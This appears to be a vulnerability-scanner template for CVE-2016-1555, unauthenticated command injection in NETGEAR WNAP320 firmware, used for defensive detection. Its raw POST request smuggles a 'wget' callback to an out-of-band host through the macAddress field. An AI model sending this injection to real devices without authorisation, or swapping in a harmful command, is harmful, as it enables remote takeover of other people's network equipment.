id: CVE-2016-1555 info: name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection author: gy741 severity: critical description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic - http://seclists.org/fulldisclosure/2016/Feb/112 - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97375 epss-percentile: 0.99873 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear product: wnap320_firmware tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016 http: - raw: - | POST /boardDataWW.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # digest: 490a0046304402201fd33c29a4a20779b3ffc62899dde04cab435eb13d4d2549f777e800f9eed96c022008ff14372c8dca69e8c20a087a7619db24f6d83a3958c0b204328d4e745a5501:922c64590222798bb761d5b6d8e72950